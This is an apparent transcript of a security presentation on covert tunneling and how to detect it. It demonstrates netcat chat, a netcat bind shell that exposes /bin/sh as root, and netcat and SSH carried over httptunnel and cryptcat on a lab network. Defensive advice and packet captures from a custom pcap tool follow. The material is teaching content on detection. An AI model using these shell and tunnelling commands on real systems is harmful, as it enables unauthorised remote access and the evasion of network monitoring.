Ku pamięci poległym... Wykonali: Karol Janicki Michał Karamański Jakub Merak
Ccue Janicki Richard
-
Upload
gui-arievilo -
Category
Documents
-
view
214 -
download
0
Transcript of Ccue Janicki Richard
-
8/13/2019 Ccue Janicki Richard
1/30
COVERT TUNNELING
Uses and Detection
Rich Janicki
-
8/13/2019 Ccue Janicki Richard
2/30
WHAT IS COVERT TUNNELING?
Today covert tunnels are defined as those that
use entities not normally viewed as data objects,but that can be manipulated maliciously totransfer information from one subject toanother[2].
Some protocols that can be used are HTTP,ICMP, DNS, and SSH to name a few
Steganography can be used to conceal data in
image files such as jpeg
-
8/13/2019 Ccue Janicki Richard
3/30
WHY IS COVERT TUNNELING IMPORTANT?
As a Network Administrator, one could use
covert tunneling for good It can provide a safe way to maintenance servers It can hide sensitive data from prying eyes
Allows one to test their network equipmentdesigned to prevent the usage of these techniques Hackers can use tunneling to hide their tracks Malware can use tunneling to receive updates
and commands, as well as hide activities
-
8/13/2019 Ccue Janicki Richard
4/30
HACKERS USE COVERT TUNNELING?
As stated earlier malware programs can use
tunneling to send and receive commands Botnets thrive on the ability to use tunneling The combinations of these techniques allow the
botnet operator to remain hidden whilecontrolling many computers
Trojan/Backdoors use common tools, orvariations of these tools, to allow remote access to
a compromised system Knowing how these tools operate is key to
defending against them
-
8/13/2019 Ccue Janicki Richard
5/30
DEMONSTRATION OF COVERT TUNNELING
-
8/13/2019 Ccue Janicki Richard
6/30
NETCAT
The Swiss Army Knife of TCP/IP
Many uses including backdoors, port scanning,port listening, simple file sharing, and simplechat
Integrates well with Covert Tunneling Implements easily into programs and scripting
-
8/13/2019 Ccue Janicki Richard
7/30
NETCAT ON TARGET
****Netcat*****
root@bt:~# nc -lp 8000 hello hi
this is a basic netcat conversation ok goodbye
see you later
-
8/13/2019 Ccue Janicki Richard
8/30
NETCAT ON ATTACKER
****Netcat Chat****
rich@netbookremix:~$ nc 192.168.1.121 8000 hello hi
this is a basic netcat conversation ok goodbye
see you later ^C
-
8/13/2019 Ccue Janicki Richard
9/30
NETCAT SHELL ON TARGET
****Netcat Shell****
root@bt:~# nc -lp 8000 -e /bin/sh
-
8/13/2019 Ccue Janicki Richard
10/30
NETCAT SHELL ON ATTACKER ****Netcat Shell****
rich@netbookremix:~$ nc 192.168.1.121 8000
whoami
root ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:76:32:56:61
inet addr:192.168.1.121 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:27 errors:0 dropped:0 overruns:0 frame:0
TX packets:21 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000
RX bytes:2452 (2.4 KB) TX bytes:1855 (1.8 KB)
Interrupt:23 Base address:0xcc00
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
-
8/13/2019 Ccue Janicki Richard
11/30
HTTPTUNNEL
****Netcat over Httptunnel (Target)****
root@bt:~# hts -F localhost:8000 80 root@bt:~# nc -lp 8000
****Netcat over Httptunnel (Attacker)**** rich@netbookremix:~$ htc -F 10001
192.168.1.121:80 rich@netbookremix:~$ nc 127.0.0.1 10001
-
8/13/2019 Ccue Janicki Richard
12/30
SSH
****Normal SSH****
rich@netbookremix:~$ ssh [email protected] [email protected]'s password:
BackTrack 4 (PwnSauce) Penetration Testingand Auditing Distribution
Last login: Thu Mar 18 21:57:43 2010 root@bt:~# whoami root
-
8/13/2019 Ccue Janicki Richard
13/30
SSH OVER HTTPTUNNEL ****SSH over Httptunnel (Target)**** root@bt:~# hts -F localhost:22 8081
****SSH over Httptunnel (Attacker)**** rich@netbookremix:~$ htc -F 10003 192.168.1.121:8081 rich@netbookremix:~$ ssh [email protected] -p 10003 The authenticity of host '[127.0.0.1]:10003 ([127.0.0.1]:10003)' can't be
established.
RSA key fingerprint is 62:fb:a9:b3:67:f0:6d:c8:58:f1:1a:01:2c:21:89:73. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '[127.0.0.1]:10003' (RSA) to the list of
known hosts. [email protected]'s password:
BackTrack 4 (PwnSauce) Penetration Testing and AuditingDistribution Last login: Thu Mar 18 22:06:26 2010 from 192.168.1.115 root@bt:~# whoami root
-
8/13/2019 Ccue Janicki Richard
14/30
CRYPTCAT
****Cryptcat****
root@bt:~# cryptcat -lp 9000 hello hi
this conversation is a basic cryptcat conversation that means its encrypted right? yes sir
goodbye see you later
-
8/13/2019 Ccue Janicki Richard
15/30
-
8/13/2019 Ccue Janicki Richard
16/30
TOOLS TO DEFEND AGAINST COVERTTUNNELING
Web Tap commercial product
Open Source firewalls such as IPCop orSmoothwall Wireshark, Network Miner, or NetWitness
Snort Intrusion Detection System (IDS)
-
8/13/2019 Ccue Janicki Richard
17/30
FIREWALL RULES
Prevent unwanted traffic Close and stop unnecessary ports and services
Prevent ACK tunneling by examining the way aconnection is initialized Set connection timeouts Enable content filtering Use Intrusion Detection Systems Use Proxies with Authentication Don't allow HTTP-CONNECT queries Use Anti-virus and anti-malware programs Inspect log files regularly, monitor traffic, a build
statistics of both [10]
-
8/13/2019 Ccue Janicki Richard
18/30
-
8/13/2019 Ccue Janicki Richard
19/30
WIRESHARK
-
8/13/2019 Ccue Janicki Richard
20/30
WIRESHARK
-
8/13/2019 Ccue Janicki Richard
21/30
WIRESHARK
-
8/13/2019 Ccue Janicki Richard
22/30
PCAPDUMP.RB
Programmed in Ruby
Uses Ruby pcap, and pcaplet libraries Command line tool to ease in viewing pcap files To be used on already captured pcap files
User can see plain text information being sentover the network faster Tool I created to learn more about pcap files and
to help understand network protocols rich@netbookremix:~/presentation$ ruby
pcapdump.rb -r alltestshub.pcap
-
8/13/2019 Ccue Janicki Richard
23/30
PCAPDUMP.RB ****************pcapdump by Rich Janicki********************
23:01:30.842629 192.168.1.115:34828 > 192.168.1.121:8000 .AP...
DATA---> hello ---------------------------------------------------------------
23:01:37.310009 192.168.1.121:8000 > 192.168.1.115:34828 .AP...
DATA---> hi
---------------------------------------------------------------
23:01:48.922890 192.168.1.115:34828 > 192.168.1.121:8000 .AP...
DATA---> this is a basic netcat conversation
---------------------------------------------------------------
23:01:55.845469 192.168.1.121:8000 > 192.168.1.115:34828 .AP...
DATA---> ok
---------------------------------------------------------------
23:01:59.603798 192.168.1.115:34828 > 192.168.1.121:8000 .AP...
DATA---> goodbye
---------------------------------------------------------------
23:02:06.518693 192.168.1.121:8000 > 192.168.1.115:34828 .AP...
DATA---> see you later
-
8/13/2019 Ccue Janicki Richard
24/30
PCAPDUMP.RB --------------------------------------------------------------- 23:02:49.115744 192.168.1.115:34829 > 192.168.1.121:8000 .AP...
DATA---> ifconfig --------------------------------------------------------------- 23:02:49.117790 192.168.1.121:8000 > 192.168.1.115:34829 .AP...
DATA---> eth0 Link encap:Ethernet HWaddr 00:0c:76:32:56:61 inet addr:192.168.1.121 Bcast:192.168.1.255
Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500
Metric:1
RX packets:27 errors:0 dropped:0 overruns:0 frame:0 TX packets:21 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:2452 (2.4 KB) TX bytes:1855 (1.8 KB) Interrupt:23 Base address:0xcc00
-
8/13/2019 Ccue Janicki Richard
25/30
PCAPDUMP CATCHING HTTPTUNNEL *--------------------------------------------------------------- 23:04:33.718566 192.168.1.115:56256 > 192.168.1.121:80 .AP...
DATA---> GET /index.html?crap=1268967869 HTTP/1.1 --------------------------------------------------------------- 23:04:33.719179 192.168.1.115:56256 > 192.168.1.121:80 .AP...
DATA---> Host: 192.168.1.121:80 Connection: close
--------------------------------------------------------------- 23:04:33.719428 192.168.1.121:80 > 192.168.1.115:56256 .AP...
DATA---> HTTP/1.1 200 OK
Content-Length: 102400 Connection: close Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Expires: 0 Content-Type: text/html
-
8/13/2019 Ccue Janicki Richard
26/30
PCAPDUMP CATCHING HTTPTUNNEL --------------------------------------------------------------- 23:04:35.657512 192.168.1.115:56255 > 192.168.1.121:80
.AP...
DATA---> --------------------------------------------------------------- 23:04:35.657515 192.168.1.115:56255 > 192.168.1.121:80
.AP...
DATA---> hello --------------------------------------------------------------- 23:04:38.660736 192.168.1.121:80 > 192.168.1.115:56256
.AP...
DATA---> E--------------------------------------------------------------- Content-Type: text/html
-
8/13/2019 Ccue Janicki Richard
27/30
CATCHING SSH F--------------------------------------------------------------- 23:06:28.404301 192.168.1.121:22 > 192.168.1.115:54506 .AP...
DATA---> SSH-2.0-OpenSSH_5.1p1 Debian-3ubuntu1 --------------------------------------------------------------- 23:06:28.410369 192.168.1.115:54506 > 192.168.1.121:22 .AP...
DATA---> SSH-2.0-OpenSSH_5.1p1 Debian-6ubuntu2 --------------------------------------------------------------- 23:06:28.410858 192.168.1.115:54506 > 192.168.1.121:22 .AP...
DATA---> ^wx?0JJf{~diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1ssh-rsa,ssh-dssaes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour128,arcfour256,arcfour,aes192-cbc,aes256-cbc,[email protected],aes128-ctr,aes192-ctr,aes256-ctraes128-cbc,3des-cbc,blowfish-cbc,cast128-
cbc,arcfour128,arcfour256,arcfour,aes192-cbc,aes256-cbc,[email protected],aes128-ctr,aes192-ctr,aes256-ctrihmac-md5,hmac-sha1,[email protected],hmac-ripemd160,[email protected],hmac-sha1-96,hmac-md5-96ihmac-md5,hmac-sha1,[email protected],hmac-ripemd160,[email protected],hmac-sha1-96,hmac-md5-96none,[email protected],zlibnone,[email protected],zlib---------------------------------------------------------------
-
8/13/2019 Ccue Janicki Richard
28/30
EXAMPLE SSH PACKET 23:06:28.411906 192.168.1.115:54506 > 192.168.1.121:22 .AP...
DATA---> " --------------------------------------------------------------- 23:06:28.423842 192.168.1.121:22 > 192.168.1.115:54506 .AP...
DATA---> IiL7+ec~x^+
'+"d{ w3-
SX]vj6&Fb?J`[G&Q
sUceL
Be rA('\ ---------------------------------------------------------------
-
8/13/2019 Ccue Janicki Richard
29/30
EXAMPLE CRYPTCAT PACKET F--------------------------------------------------------------- 23:12:36.584469 192.168.1.115:57305 > 192.168.1.121:9000 .AP...
DATA---> QJmQk,N---------------------------------------------------------------
23:12:36.584479 192.168.1.115:57305 > 192.168.1.121:9000 .AP...
DATA---> 192.168.1.115:57305 .AP...
DATA--->
>9M--------------------------------------------------------------- 23:12:43.066825 192.168.1.121:9000 > 192.168.1.115:57305 .AP...
DATA---> 3f_8=M---------------------------------------------------------------
-
8/13/2019 Ccue Janicki Richard
30/30
CONCLUSION
Some things to think about
These tests were performed on a local network They can be expanded to simulate an attack on a
large network Pcap files can get very large, very quickly Dont run Wireshark for extended periods of time All of the tests were captured in about 15
minutes using one pcap file Using pcapdump to save the output to a text file
(in this case) creates a fairly large file